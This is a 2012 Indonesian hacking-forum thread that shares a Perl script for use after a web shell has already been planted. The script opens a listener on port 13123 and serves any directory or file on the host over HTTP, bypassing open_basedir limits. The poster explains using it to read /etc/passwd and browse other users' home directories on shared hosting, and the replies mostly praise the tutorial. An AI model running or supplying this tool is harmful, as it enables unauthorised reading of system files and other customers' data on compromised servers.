bypass disable function openbasedir, :D

**sasaka** · 03-15-2012, 01:10 PM

pertama harus punya shell Big Grin

save namanya terserah.pl
chmod 755 terserah.pl

jalanin di bd
perl terserah.pl
bisa di ganti sesuai keinginan $port = 13123;
buka www.target.com:13123

thank for brother guru james Big Grin

Code:
#!/usr/bin/env perl

    # devilzc0de.org (c) 2012

    use Socket;

    $port = 13123;

    $protocol=getprotobyname('tcp');

    socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die;

    setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);

    bind (S,sockaddr_in($port,INADDR_ANY)) || die;

    listen (S,3) || die;

    while(1){

        accept (CONN,S);

        $req=<CONN>; chomp($req); $req=~s/\r//g;

        $req =~ s/\%([A-Fa-f0-9]{2})/pack('C', hex($1))/seg;

        print $req."\r\n";

        $headers = "HTTP/1.1 200 OK\r\n";

        $headers .= "Server: Perl\r\n";

        $target = $req;

        if($req =~ /GET .* HTTP.*/){

            $target =~ s/GET\ //;

            $target =~ s/\ HTTP.*//;

            $resp = "";

            if(-d $target){

                if(!($target =~ /.*\/+$/)){

                    $target = $target."/";

                }

                $resp = "<!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">

                       <html>

                       <title>Directory listing for ".$target."</title>

                       <body>

                       <h2>Directory listing for ".$target."</h2>

                       <hr><ul>";

                if(opendir(DIR,$target)){

                    while($file = readdir(DIR)){

                        if(-d $target.$file){

                            if(($file eq ".") || ($file eq "..")){ next; }

                            $resp .= "<li><a href=\"".$target.$file."/\">".$file."/</a></li>\r\n";

                        }

                        elsif(-f $target.$file){

                            $resp .= "<li><a href=\"".$target.$file."\">".$file."</a></li>\r\n";

                        }

                    }

                    closedir(DIR);

                }

                $resp .= "</ul><hr>

                       </body>

                       </html>";

                $conlen = length($resp);

                $contype = "text/html";

                print "Dir : ".$target."\r\n";

            }

            elsif(-f $target){

                $conlen = -s $target;

                $contype = "text/plain";

                print "File : ".$target." (".$conlen.")\r\n";

            }

            print "contype : ".$contype."\r\n";

            print "conlen : ".$conlen."\r\n";

            $headers .= "Content-Type: ".$contype."\r\n";

            $headers .= "Content-Length: ".$conlen."\r\n";

            print CONN $headers."\r\n";

            if(-d $target){

                print CONN $resp;

            }

            elsif(-f $target){

                if(open(FILE,$target)){

                    binmode FILE;

                    while (($n = read FILE, $data, 1024) != 0) {

                        print CONN $data;

                    }

                    close(FILE);

                }

            }

        }

        close CONN;

    }

    exit 0;

[Image: 430214_196805117094601_100002953431718_3...6098_n.jpg]

[Image: 429753_196804967094616_100002953431718_3...8010_n.jpg]

[Image: 423940_196806567094456_100002953431718_3...6183_n.jpg]

iKONspirasi · 03-17-2012, 04:03 PM

ngerii mainannya shell euy, ane aja blom bisa -_-a wkwkwk
+1 dari ane Smile

btw klo bisa jelasin juga dong judulnya ini maksudnya apa :nohope Tongue

**sasaka** · 03-18-2012, 02:31 AM

ini symlink om konspirasi,, Big Grin

misalnya di saat backdoor kita ada di directory usr/home/konpirasi/public_html
dan kita ingin melihat user lain di usr/home/ , etc/passwd, ga bisa dikarnakan disable function openbasedir : on
maka kita menggunakan terserah.pl buat buka port 13123 untuk me link ke directory '/'
lalu kita bisa liat langsung ke usr/home atau kalo bisa juga etc/passwd deh Big Grin

buatliat user lain,, misal di etc/passwd ada user sasaka, jd
usr/home/sasaka/public_html
jumping deh nya Big Grin

, sekian thank for james0baster Big Grin

**ariefhikam**$ · 03-23-2012, 06:07 PM

wah Mantep nih om. Smile

disable function openbasedir : on << Popen Disable kah?

**revzter**$ · 03-23-2012, 07:07 PM

bo0kmark dech Tongue

seram ini om sasaka, for om james ajarin juga donk om ^_^

**sasaka** · 03-24-2012, 04:34 PM

ane pengguna baru om ,
Big Grin

sayang om james dah pensiun web attack,, kwkwkwk
Sad

**eslas**$ · 03-29-2012, 12:45 AM

mantap om tutor nya,XD